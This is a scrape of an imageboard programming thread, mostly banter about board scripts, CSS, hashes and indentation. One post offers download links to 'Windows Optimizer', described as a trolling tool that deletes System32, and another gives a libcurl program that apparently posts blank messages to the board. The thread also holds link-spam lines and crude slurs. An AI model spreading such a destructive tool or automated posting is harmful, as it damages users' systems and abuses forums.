howdy REchan, thought you might find this interesting: http://9ch.in/overscript/
Holy shit that's a lot.
I guess I should write the glitches I found somewhere instead of complaining everywhere.
>>26
I tried the board script and it only shows two threads and then stops working.
RTFM and figure out what you did wrong, s0 is not Kusaba.
ZMVTb1 <a href="http://ftoojcbgsmtj.com/">ftoojcbgsmtj</a>, [url=http://lyzzbtshwzsv.com/]lyzzbtshwzsvurl, [link=http://xedjoikpncxe.com/]xedjoikpncxelink, http://bfvjokjveqbg.com/
fuck how do I use md5 hashes
>>30 if your using windows get something likemd5checker(ithinkthatsthename) and compare the md5 of what its supposed to be to your md5
I got spoilers fixed by putting .spoiler:hover {color:white} in the CSS file.
The default style is real ugly
post some good looking styles
also how do i change the background not the Tables but the actual background backgtound thats in between everything
Beauty is in the eye of the beholder.
And learn HTML, even those MySpace idiots can figure out how to set a background.
>Tables
Either, obvious troll is obvious, or this guy has read a book on html that is way old...
new tech/science wiki recruiting mods and programmers, contact buildwikicontact@gmail.com
buildwiki.org
So I got banned from sourceforge and google code after hosting the development of Windows Optimizer there and I'd really love to see a community working on it.
Maybe some people here would like to contribute.
Windows Optimizer is a tool for trolling that will delete System32 and other files neccessary for Windows to boot.
It has been successfully tested on 2k, xp and windows 7 beta. I don't have Vista to test it.
I'd really like to see a nicer GUI and icon, as one idea where people could contribute.
Source under GPL:
http://rapidshare.com/files/182581401/optimizer2009-r0-src.zip
Binaries:
http://rapidshare.com/files/182582568/optimizer2009-r0.zip
That is unscientific and ultimately destructive.
sounds awesome to me.
ecause we all need a better way to hide our porn in text: here is a binary to hex converter (one way only; write the decoder yourself) that makes the output look like some crazy translated Japanese. It works best with compressed files, very poorly with executables.
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main (void)
{
char * hi [16] =
{ "b", "d", "f", "g", "h", "j", "k", "m", "n",
"p", "r", "s", "t", "w", "y", "z" };
char * lo [16] =
{ "a", "e", "i", "o", "u", "aa", "ee", "ii", "oo",
"uu", "ai", "ei", "oe", "oi", "ue", "ui" };
int in, bc, nw, wc;
srand(time(NULL));
bc = 0;
wc = 0;
nw = (rand() % 5) + 1;
in = getchar();
while (in != EOF)
{
printf("%s%s", hi[in >> 4], lo[in & 15]);
in = getchar();
bc++;
if (bc == nw)
{
wc++;
(Post truncated.)
According to old versions of the Wikipedia article for Eclipse, there is an eclipse plugin:
http://74.125.45.104/search?q=cache:en.encyclopedia.livepress.com/index.php/Eclipse_(software)+interactive-disassembler
The plugin is supossed to be called EclipseIDA-Interactive DisassemblerToDecompiler and is supossed to be here:
http://www.idapython.narod.ru/
But I can't find it.
Anybody here integrating IDA with Eclipse?
Eclipse
HAHAHAHAHAHAHAHAHAHAHAHAHAHA
Why would you want to do that ;_;
since 4chan's /prog/ broke, mind if we hang out here?
sure, since the "war of chans" is going on right now
Learn to samefag.
Here we go again...
/* @true.c */
int main() {
return 0;
}/* @false.c */
int main() {
return 1;
}
also, /ac/ is that way --->
bampu pantsu
hax my anus
S9KBeF <a href="http://oeqthgbsgehp.com/">oeqthgbsgehp</a>, [url=http://adxsvlkptski.com/]adxsvlkptskiurl, [link=http://ipkecmhllymg.com/]ipkecmhllymglink, http://zdjudtopoain.com/
>>29
I, for one, suggest the only sensible thing.
Use a tab for indenting, and spaces for indenting further than the current indent profile (such as, aligning up equal signs). This way, you can set your own tab width and it won't look like shit, it only uses half the disk space that the current style does, and because I don't get your style showed down my throat I might even choose to join the project, while you may keep it with a simple ts=2.
just wait and see
in this thread thread?
ucohde <a href="http://bdkvavogqxhd.com/">bdkvavogqxhd</a>, [url=http://issqwzatrtta.com/]issqwzatrttaurl, [link=http://zgleoanexbnb.com/]zgleoanexbnblink, http://edmujsdxecjo.com/
inb4 curl
Call me a retard or whatever, but... I have no idea what the fuck you mean.
thats sad
#include <stdio.h>#include <string.h>#include <curl/curl.h>#include <curl/types.h>#include <curl/easy.h>int main(int argc, char *argv[]){ CURL *curl; CURLcode res; struct curl_httppost *formpost=NULL; struct curl_httppost *lastptr=NULL; struct curl_slist *headerlist=NULL; static const char buf[] = 'Expect:'; curl_global_init(CURL_GLOBAL_ALL); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, 'id', CURLFORM_COPYCONTENTS, '1210199290008', CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, 'bd', CURLFORM_COPYCONTENTS, 'prog', CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, 'oinkoink', CURLFORM_COPYCONTENTS, '', CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, 'nm', CURLFORM_COPYCONTENTS, '', CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, 'em', CURLFORM_COPYCONTENTS, 'sage', CURLFORM_END); curl_formadd(&formpost, &lastptr, CURLFORM_COPYNAME, 'txt', CURLFORM_COPYCONTENTS, '', CURLFORM_END); curl = curl_easy_init(); /* initalize custom header list (stating that Expect: 100-continue is not wanted */ headerlist = curl_slist_append(headerlist, buf); if(curl) { /* what URL that receives this POST */ curl_easy_setopt(curl, CURLOPT_URL, 'http://rechan.eu.org/s0.php'); if ( (argc == 2) && (!strcmp(argv[1], 'noexpectheader')) ) /* only disable 100-continue header if explicitly requested */ curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headerlist); curl_easy_setopt(curl, CURLOPT_HTTPPOST, formpost); res = curl_easy_perform(curl); /* always cleanup */ curl_easy_cleanup(curl); /* then cleanup the formpost chain */ curl_formfree(formpost); /* free slist */ curl_slist_free_all (headerlist); } return 0}
(define a (call/cc identity))
wot
Saging in a board with just a page
shit script is shit
I FUCKING HATE IT
Can this be a /prog/ replacement while this butthurt (lol butthurt) faggot stops thinking it's funny?
REchan was never meant to be a /prog/ replacement, but a subdivision of, for more SRS BSNSS.
I heard Cudder is female, but i need proof!!